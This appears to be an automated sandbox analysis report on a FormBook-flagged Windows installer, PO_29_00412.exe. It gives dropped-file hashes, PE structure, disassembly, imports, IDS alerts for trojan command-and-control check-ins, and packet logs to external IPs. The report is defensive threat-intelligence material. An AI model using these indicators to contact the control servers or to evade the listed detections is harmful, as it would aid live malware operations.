                                                                          SHA1:6E6DDC65BB6CB77FF9A4628D6498DC13051DA7AB
                                                                          SHA-256:C18D0E93AE4638839D848201E27E02D7E582A2CD89C28AA5E5E33A3ACB645685
                                                                          SHA-512:9443ECB40806184F8CE7D60BEB04173952FA7638F7F1BEF9B5B1A9CA706D90A04C72E9CA23EB95BF5E2DFB7F3599C93E36F046DA220EFC7B66DDAE2E4C32BACF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: r....;8..zYP.p..c..|X4O.....<+.........o..{M{Q.r...7.F@.....|/..0:...:.*...)^N..|.G.p\a....U....M..y.RUb...v..x.....H...u...o....x....Ed.Y.6.....P.....>,...."w0.j.0..(.3...z.....,d#.q.'...b...><..n.. ....y.E.@.2...i.X7.N.H..@o...wI...o.F......H.......+...|...."d))-r..."A.r.......e.z.8..E.tA.F.;....D...`[..|.\...Y..JHO.^Kkk.t..&...]|.HC.~%.].R3.H%R....d.\,.BS.ef.c.u5....=..w.Ef..Z..".s..8.....N:.6\X.l.T.~.......9..L..:.p....0A.$.J.a.........S........N.-.y.........i;.bE......xd3.......2.GY....~..@+...K.v....!...6.6q....].c.K......i..R....j.....:.y.4_#..x.t..*(.......j.|j.."b.......airx...62u\....1E...>[._4....O...i/k..'...d..v.c_...._..t..=.z.H..t.JR....y...Zy.(5X....2A..P=./o.....o.F.m......+dy..N. u5.u....o........V.WE....cQ.\SL.....(..|o]...>.8..p........o._..[...|uA.......Mj..+...........{o.M.g=...U.".};...E..YFQ.S..B.......^..%.nU.......n.+.B..='I....i<[..J...dRq........jg.....n........A...c1.].....N.Z;....n>A......{{
                                                                          C:\Users\user\AppData\Local\Temp\d4kvs9nrjol318
                                                                          Process:C:\Users\user\Desktop\PO_29_00412.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6661
                                                                          Entropy (8bit):7.467667870043356
                                                                          Encrypted:false
                                                                          SSDEEP:192:vIa0as4R41v/XwaAAOl5sEMk3UbtnstdWDnh5:vIar1m8urkitstej
                                                                          MD5:6B51D1A07B6FA420D917089F3A1B4C4B
                                                                          SHA1:CAEE7C207CF7D17107E37B03295417A66209DB7A
                                                                          SHA-256:A5E2742D8E64617FEE759D0E56A18396643806D13BE2E23A047A44678C8500AB
                                                                          SHA-512:760BFF17010E2BCA9299FA4E862F5C8EA43AC2E313AF32FF16BB21E9D253DB55F51F514579DE8FF8E4EC70F97E22CBB3EADE339D1AEF2553DEAD4FBCD13B776E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: 6I....7.........c...2.=..z...t........z.........2.....3?."..$.-..[t.......Q..|....._|.........HF4yy...S.FH.G.$.YHF<.C.-......1........d....x.K.......t.AHF<q......<FH!J..,2=HF4. ....C....-.-.....|......|...U.l....yz....{4FHy....HF<......<FHZO-............s!....2.....v..!.#m..qp.m...o..........p..U....-.+.-...1#........0.Z;..,.#....HF<......<FH...,2.HF4.....u......-......!...xz.........#......m...4FH.5.....HF<.......<FH!..-.....t...........p........K.keEFH....WEFH...EF<.....HF<..I..........+3.0Ld.?.]...v,..o.......M.;;...F<F.....F.s...?3,..HF..)....;7...........N......l.{...'wvM..F.o...;....<FH..CEV<.........{#.n^..$....ccv........t:..{....;...k!.u.....F..k.Q.33...F..+.................d.t...g..........4FH..HF...w.$.3,.;6.{..........G...t..xz.......Cx..l....G.....@r..lG6.o%....t..<...:..2k...c..+.....{.....|/.{....Ot.:....@?;.z......k.2.kEHF...........!.!.d...z.>..#..{....C..x.J??..?;HF.....$;G4FcF.wH0....O.6ets..{......rr.s...?w+..KH sFHF
                                                                          C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp\o9oo.dll
                                                                          Process:C:\Users\user\Desktop\PO_29_00412.exe
                                                                          File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3584
                                                                          Entropy (8bit):4.283140881167584
                                                                          Encrypted:false
                                                                          SSDEEP:48:SR5BArRhgJZW/GsSZQXPq6qmhHhTVFGv9dOeduSRV3DM/+VRuqS:QLJZcSZGP5cOhstDM/+vx
                                                                          MD5:68028C850C4B64715A5EECDD87E323E1
                                                                          SHA1:19558F369CFB3520B8C7734B3820DC15320F1437
                                                                          SHA-256:C9023147AE6C924B482CE1A2EE4377659C07A75836B91754834DB9E8327EFE35
                                                                          SHA-512:D7343B08CAEF46436904045BF887B1E6556C47FD25EF654722968473088E8F1C8E331DA33C145324C8784FDEDEFD5DF122C9779C5F0A83B76AE159A254D51507
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 15%
                                                                          Reputation:low
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C..Q"..Q"..Q"..EI..Z"..Q"..I"...K..P"...K..P"...KJ.P"...K..P"..RichQ"..................PE..L....$.`...........!......................... ...............................@......................................0!..P...\"..x....0...............................!............................................... ...............................text............................... ..`.rdata..Z.... ......................@..@.rsrc........0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Temp\nsw1FAB.tmp
                                                                          Process:C:\Users\user\Desktop\PO_29_00412.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):178751
                                                                          Entropy (8bit):7.957118673696818
                                                                          Encrypted:false
                                                                          SSDEEP:3072:YIrPRlTkktGUJlA5BIyEEh/CZqfISXj4hwTazhY30DirC1Jk3gK:YIr/FwO4BOEh/CZqASXjqA6Df83
                                                                          MD5:140C25EBB115307197F2CA5A62BFD619
                                                                          SHA1:139D0B38E18B44B7FBF4FF8DC840A03DDBF7CB84
                                                                          SHA-256:57045F72601DDE1A0AA3C0266E37FE0C6EBEF65DCFF3626568955AB5EECA5C17
                                                                          SHA-512:15D435D8D204D9AB979FBF0B02225CB13EF607C9F502348EAC337AA1558A0A06A02FD82DAD985AA2D94FFEE8AA21EB1024353F49F8BEFFF203364EC3E68BBDEB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: *.......,...............................D.......*...........................................................................................................................................................................................................................................J............... ...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.880621903530284
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:PO_29_00412.exe
                                                                          File size:212081
                                                                          MD5:e4ad95f61666b540024ff22a60816843
                                                                          SHA1:c4a9865e453e8592047a849640b455f2e499f162
                                                                          SHA256:bc4765682b3b1250e178d1154cfd56fbe1fb4ac0c8e8346d9e6f3ed6c661907d
                                                                          SHA512:6f56020e4ed3d9ce3d6e9ae6ac48a1597d75b0a77fe0fe9208f93d7306423af4790d3a6681d9834ffb0ca7d09442892bece49cc5ee0767cbb203d045bb5f6c53
                                                                          SSDEEP:3072:lEre7GjyCaFvc9bnTyKQcdR+wR3V/msj+kEqZfnBDm3SIjvBJVIpK0d6XTxik:lPXITwcH4cZEufNBIjvB8pK0dKTxik
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                                                          File Icon

                                                                          Icon Hash:b2a88c96b2ca6a72

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x403461
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          sub esp, 00000184h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [esp+18h], ebx
                                                                          mov dword ptr [esp+10h], 0040A130h
                                                                          mov dword ptr [esp+20h], ebx
                                                                          mov byte ptr [esp+14h], 00000020h
                                                                          call dword ptr [004080B0h]
                                                                          call dword ptr [004080C0h]
                                                                          and eax, BFFFFFFFh
                                                                          cmp ax, 00000006h
                                                                          mov dword ptr [0042474Ch], eax
                                                                          je 00007FF468E58303h
                                                                          push ebx
                                                                          call 00007FF468E5B47Eh
                                                                          cmp eax, ebx
                                                                          je 00007FF468E582F9h
                                                                          push 00000C00h
                                                                          call eax
                                                                          mov esi, 004082A0h
                                                                          push esi
                                                                          call 00007FF468E5B3FAh
                                                                          push esi
                                                                          call dword ptr [004080B8h]
                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                          cmp byte ptr [esi], bl
                                                                          jne 00007FF468E582DDh
                                                                          push 0000000Bh
                                                                          call 00007FF468E5B452h
                                                                          push 00000009h
                                                                          call 00007FF468E5B44Bh
                                                                          push 00000007h
                                                                          mov dword ptr [00424744h], eax
                                                                          call 00007FF468E5B43Fh
                                                                          cmp eax, ebx
                                                                          je 00007FF468E58301h
                                                                          push 0000001Eh
                                                                          call eax
                                                                          test eax, eax
                                                                          je 00007FF468E582F9h
                                                                          or byte ptr [0042474Fh], 00000040h
                                                                          push ebp
                                                                          call dword ptr [00408038h]
                                                                          push ebx
                                                                          call dword ptr [00408288h]
                                                                          mov dword ptr [00424818h], eax
                                                                          push ebx
                                                                          lea eax, dword ptr [esp+38h]
                                                                          push 00000160h
                                                                          push eax
                                                                          push ebx
                                                                          push 0041FD10h
                                                                          call dword ptr [0040816Ch]
                                                                          push 0040A1ECh

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xbc8.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x623c0x6400False0.65859375data6.40257705324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x12740x1400False0.43359375data5.05749598324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x1a8580x600False0.445963541667data4.08975001509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x2d0000xbc80xc00False0.435546875data4.46172201417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x2d1c00x2e8dataEnglishUnited States
                                                                          RT_DIALOG0x2d4a80x144dataEnglishUnited States
                                                                          RT_DIALOG0x2d5f00x100dataEnglishUnited States
                                                                          RT_DIALOG0x2d6f00x11cdataEnglishUnited States
                                                                          RT_DIALOG0x2d8100x60dataEnglishUnited States
                                                                          RT_GROUP_ICON0x2d8700x14dataEnglishUnited States
                                                                          RT_MANIFEST0x2d8880x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                          Imports

                                                                          DLLImport
                                                                          ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                          SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                          ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                          USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          04/29/21-07:56:10.255535TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.3
                                                                          04/29/21-07:56:26.081366TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3198.185.159.144
                                                                          04/29/21-07:56:26.081366TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3198.185.159.144
                                                                          04/29/21-07:56:26.081366TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3198.185.159.144
                                                                          04/29/21-07:56:31.448165TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.3198.71.232.3
                                                                          04/29/21-07:56:31.448165TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.3198.71.232.3
                                                                          04/29/21-07:56:31.448165TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.3198.71.232.3
                                                                          04/29/21-07:56:47.928130TCP1201ATTACK-RESPONSES 403 Forbidden804974334.102.136.180192.168.2.3
                                                                          04/29/21-07:56:58.105644TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3216.239.38.21
                                                                          04/29/21-07:56:58.105644TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3216.239.38.21
                                                                          04/29/21-07:56:58.105644TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3216.239.38.21
                                                                          04/29/21-07:57:14.035387TCP1201ATTACK-RESPONSES 403 Forbidden804974834.102.136.180192.168.2.3
                                                                          04/29/21-07:57:19.299715TCP1201ATTACK-RESPONSES 403 Forbidden804974934.102.136.180192.168.2.3

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 29, 2021 07:56:10.070152044 CEST4972780192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:10.111097097 CEST804972734.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:10.111221075 CEST4972780192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:10.111334085 CEST4972780192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:10.154606104 CEST804972734.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:10.255534887 CEST804972734.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:10.255561113 CEST804972734.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:10.255755901 CEST4972780192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:10.255816936 CEST4972780192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:10.298547983 CEST804972734.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:15.428168058 CEST4972980192.168.2.335.208.69.149
                                                                          Apr 29, 2021 07:56:15.590614080 CEST804972935.208.69.149192.168.2.3
                                                                          Apr 29, 2021 07:56:15.590862989 CEST4972980192.168.2.335.208.69.149
                                                                          Apr 29, 2021 07:56:15.591011047 CEST4972980192.168.2.335.208.69.149
                                                                          Apr 29, 2021 07:56:15.749880075 CEST804972935.208.69.149192.168.2.3
                                                                          Apr 29, 2021 07:56:15.749929905 CEST804972935.208.69.149192.168.2.3
                                                                          Apr 29, 2021 07:56:15.749957085 CEST804972935.208.69.149192.168.2.3
                                                                          Apr 29, 2021 07:56:15.750086069 CEST4972980192.168.2.335.208.69.149
                                                                          Apr 29, 2021 07:56:15.750128984 CEST4972980192.168.2.335.208.69.149
                                                                          Apr 29, 2021 07:56:15.910804033 CEST804972935.208.69.149192.168.2.3
                                                                          Apr 29, 2021 07:56:25.941989899 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.080498934 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.081100941 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.081366062 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.214119911 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217263937 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217288017 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217303991 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217317104 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217333078 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217351913 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217379093 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217412949 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217431068 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217438936 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.217447996 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.217572927 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.217684031 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.349875927 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.349898100 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.349910975 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.349924088 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.349941015 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.349958897 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350048065 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350064039 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.350066900 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350085020 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350101948 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350119114 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350140095 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350181103 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.350191116 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.350193977 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350213051 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350229979 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350248098 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350263119 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.350272894 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350292921 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.350296021 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.350320101 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.350368023 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:26.352905989 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.352927923 CEST8049731198.185.159.144192.168.2.3
                                                                          Apr 29, 2021 07:56:26.353043079 CEST4973180192.168.2.3198.185.159.144
                                                                          Apr 29, 2021 07:56:31.310920000 CEST4973280192.168.2.3198.71.232.3
                                                                          Apr 29, 2021 07:56:31.446881056 CEST8049732198.71.232.3192.168.2.3
                                                                          Apr 29, 2021 07:56:31.447019100 CEST4973280192.168.2.3198.71.232.3
                                                                          Apr 29, 2021 07:56:31.448164940 CEST4973280192.168.2.3198.71.232.3
                                                                          Apr 29, 2021 07:56:31.582675934 CEST8049732198.71.232.3192.168.2.3
                                                                          Apr 29, 2021 07:56:31.582693100 CEST8049732198.71.232.3192.168.2.3
                                                                          Apr 29, 2021 07:56:31.582700014 CEST8049732198.71.232.3192.168.2.3
                                                                          Apr 29, 2021 07:56:31.583056927 CEST4973280192.168.2.3198.71.232.3
                                                                          Apr 29, 2021 07:56:31.583168030 CEST4973280192.168.2.3198.71.232.3
                                                                          Apr 29, 2021 07:56:31.716217995 CEST8049732198.71.232.3192.168.2.3
                                                                          Apr 29, 2021 07:56:36.830766916 CEST4973680192.168.2.3154.216.244.232
                                                                          Apr 29, 2021 07:56:37.124933004 CEST8049736154.216.244.232192.168.2.3
                                                                          Apr 29, 2021 07:56:37.125045061 CEST4973680192.168.2.3154.216.244.232
                                                                          Apr 29, 2021 07:56:37.125186920 CEST4973680192.168.2.3154.216.244.232
                                                                          Apr 29, 2021 07:56:37.421509981 CEST8049736154.216.244.232192.168.2.3
                                                                          Apr 29, 2021 07:56:37.425286055 CEST8049736154.216.244.232192.168.2.3
                                                                          Apr 29, 2021 07:56:37.425312042 CEST8049736154.216.244.232192.168.2.3
                                                                          Apr 29, 2021 07:56:37.425431967 CEST4973680192.168.2.3154.216.244.232
                                                                          Apr 29, 2021 07:56:37.425503969 CEST4973680192.168.2.3154.216.244.232
                                                                          Apr 29, 2021 07:56:37.716183901 CEST8049736154.216.244.232192.168.2.3
                                                                          Apr 29, 2021 07:56:42.545422077 CEST4974280192.168.2.3198.251.84.92
                                                                          Apr 29, 2021 07:56:42.607601881 CEST8049742198.251.84.92192.168.2.3
                                                                          Apr 29, 2021 07:56:42.607784033 CEST4974280192.168.2.3198.251.84.92
                                                                          Apr 29, 2021 07:56:42.608278036 CEST4974280192.168.2.3198.251.84.92
                                                                          Apr 29, 2021 07:56:42.671920061 CEST8049742198.251.84.92192.168.2.3
                                                                          Apr 29, 2021 07:56:42.671952009 CEST8049742198.251.84.92192.168.2.3
                                                                          Apr 29, 2021 07:56:42.672041893 CEST8049742198.251.84.92192.168.2.3
                                                                          Apr 29, 2021 07:56:42.672302008 CEST4974280192.168.2.3198.251.84.92
                                                                          Apr 29, 2021 07:56:42.672444105 CEST4974280192.168.2.3198.251.84.92
                                                                          Apr 29, 2021 07:56:42.734294891 CEST8049742198.251.84.92192.168.2.3
                                                                          Apr 29, 2021 07:56:47.748521090 CEST4974380192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:47.790978909 CEST804974334.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:47.791071892 CEST4974380192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:47.791250944 CEST4974380192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:47.832119942 CEST804974334.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:47.928129911 CEST804974334.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:47.928158045 CEST804974334.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:47.928350925 CEST4974380192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:47.928476095 CEST4974380192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:56:47.969326973 CEST804974334.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:56:58.062237024 CEST4974480192.168.2.3216.239.38.21
                                                                          Apr 29, 2021 07:56:58.105266094 CEST8049744216.239.38.21192.168.2.3
                                                                          Apr 29, 2021 07:56:58.105525017 CEST4974480192.168.2.3216.239.38.21
                                                                          Apr 29, 2021 07:56:58.105643988 CEST4974480192.168.2.3216.239.38.21
                                                                          Apr 29, 2021 07:56:58.146631002 CEST8049744216.239.38.21192.168.2.3
                                                                          Apr 29, 2021 07:56:58.186125994 CEST8049744216.239.38.21192.168.2.3
                                                                          Apr 29, 2021 07:56:58.186153889 CEST8049744216.239.38.21192.168.2.3
                                                                          Apr 29, 2021 07:56:58.186162949 CEST8049744216.239.38.21192.168.2.3
                                                                          Apr 29, 2021 07:56:58.186239958 CEST8049744216.239.38.21192.168.2.3
                                                                          Apr 29, 2021 07:56:58.186312914 CEST8049744216.239.38.21192.168.2.3
                                                                          Apr 29, 2021 07:56:58.186346054 CEST4974480192.168.2.3216.239.38.21
                                                                          Apr 29, 2021 07:56:58.186368942 CEST4974480192.168.2.3216.239.38.21
                                                                          Apr 29, 2021 07:56:58.186517954 CEST4974480192.168.2.3216.239.38.21
                                                                          Apr 29, 2021 07:57:03.320357084 CEST4974580192.168.2.3185.178.208.160
                                                                          Apr 29, 2021 07:57:03.371577978 CEST8049745185.178.208.160192.168.2.3
                                                                          Apr 29, 2021 07:57:03.371998072 CEST4974580192.168.2.3185.178.208.160
                                                                          Apr 29, 2021 07:57:03.372229099 CEST4974580192.168.2.3185.178.208.160
                                                                          Apr 29, 2021 07:57:03.423641920 CEST8049745185.178.208.160192.168.2.3
                                                                          Apr 29, 2021 07:57:03.484061003 CEST8049745185.178.208.160192.168.2.3
